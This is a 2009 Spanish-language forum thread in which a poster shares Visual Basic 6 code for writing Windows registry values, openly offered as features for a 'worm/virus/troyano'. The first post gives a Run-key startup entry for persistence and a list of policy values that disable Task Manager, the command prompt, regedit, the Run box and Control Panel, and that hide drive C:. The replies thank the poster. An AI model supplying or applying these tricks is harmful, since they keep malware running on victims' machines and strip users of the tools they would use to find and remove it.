elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Jugando con el registro de Windows
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con el registro de Windows  (Leído 4,283 veces)
carlitrosss6

Desconectado Desconectado

Mensajes: 18


You know you're right.


Ver Perfil
Jugando con el registro de Windows
« en: 1 Junio 2009, 06:42 am »

Hola!

Querìa compartir algunas entradas del registro que hacen cosas curiosas y haran feliz a nuestro worm/virus/troyano  ;D

Antes que nada,el codigo para modificar una entrada en el registro (hay otras formas,pero esta me gusta):

Código:

'MODULO

'Constantes de tipos de datos
  Private m_lngRetVal As Long
  Private Const REG_SZ As Long = 1
  Private Const REG_BINARY As Long = 3
  Private Const REG_DWORD As Long = 4
  
 'Constantes para las llaves
  Public Const HKEY_CLASSES_ROOT As Long = &H80000000
  Public Const HKEY_CURRENT_USER As Long = &H80000001
  Public Const HKEY_LOCAL_MACHINE As Long = &H80000002
  Public Const HKEY_USERS As Long = &H80000003
  
  'API
   Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal lngRootKey As Long) As Long
  
   Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" _
            (ByVal lngRootKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
  
   Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" _
            (ByVal lngRootKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, _
             ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long


'Esta es nuestra funciòn para crear/editar una entrada:

Public Sub RegC(ByVal lngRootKey As Long, ByVal strRegKeyPath As String, _
                               ByVal strRegSubKey As String, varRegData As Variant)
  Dim lngKeyHandle As Long
  Dim lngDataType As Long
  Dim lngKeyValue As Long
  Dim strKeyValue As String
  If IsNumeric(varRegData) Then
      lngDataType = REG_DWORD
  Else
      lngDataType = REG_SZ
  End If
  m_lngRetVal = RegCreateKey(lngRootKey, strRegKeyPath, lngKeyHandle)
  Select Case lngDataType
         Case REG_SZ:
              strKeyValue = Trim(varRegData) & Chr(0)     '
              m_lngRetVal = RegSetValueEx(lngKeyHandle, strRegSubKey, 0&, lngDataType, _
                                          ByVal strKeyValue, Len(strKeyValue))
                                  
         Case REG_DWORD:
              lngKeyValue = CLng(varRegData)
              m_lngRetVal = RegSetValueEx(lngKeyHandle, strRegSubKey, 0&, lngDataType, _
                                         lngKeyValue, 4&)
  End Select
  m_lngRetVal = RegCloseKey(lngKeyHandle)
End Sub


Un ejemplo para usar la funciòn :

Código:
RegC HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run","Hola","c:\Hola.exe"

Se creara/modificara la entrada Hola,con los datos "c:\hola.exe",en la ruta HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Ahora lo bueno:

Para ocultar el acceso al Panel de Control.
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","NoDispCPL","1"

Para desaparecer el botòn de Apagar:
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoClose","1"

Para dejar en blanco el escritorio(No iconos):
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoDesktop","1"

Para restringir drives de Mi PC
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoDrives","3"

Para esa funciòn,pueden cambiar el "3" por los sig. valores para resultados diferentes: "3" restringe acceso a las unidades A y B,"4" restringe C: (buenisimo),"7" restringe A,B y C,"F" de A hasta D.

Para desactivar el botòn Buscar:
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoFind","1"

Para desactivar Opciones de Carpeta:
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoFoldeOptions","1"

Para desactivar el boton Ejecutar:
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoRun","1"

Para desactivar que se guarden los cambios al cerrar sesion :
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoSaveSettings","1"

Para desactivar la modificaciòn del registro (regedit y regedt32) :
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","DisableRegistryTools","1"

Para desactivar el admin. de tareas (taskmgr) :
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","DisableTaskManager","1"

Para desactivar la consola (cmd) :
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","DisableCMD","1"

Espero que les agrade  ;D


« Última modificación: 1 Junio 2009, 07:02 am por carlitrosss6 » En línea

Arriba Mèxico!!
Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Re: Jugando con el registro de Windows
« Respuesta #1 en: 7 Junio 2009, 00:43 am »

Gracias por el porte, seran de bastante ayuda  ;)


En línea

Graphixx


Desconectado Desconectado

Mensajes: 1.336


Full Stack Developer


Ver Perfil WWW
Re: Jugando con el registro de Windows
« Respuesta #2 en: 25 Junio 2009, 04:29 am »

Gracias por la info, se sumara a mi proyecto...

Men, ya resubi el programa con el codigo fuente incluido...

yo creo que todo lo que necesitas lo puedes encontrar en el programa que yo hice, esta hecho en visual basic 6.0 e incluye el codigo fuente..... es un editor del registro el mas completo que se ha programado nunca... si lo modificas y le añades funciones nuevas espero que mantengas el proyecto abierto vale...

Editor del Registro/Abolir todas las restricciones del WinXP
En línea

Nada tiene fin solo hay pequeñas pausas, pausas que determinan el comienzo de otros. Graphixx Rōninnovation
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines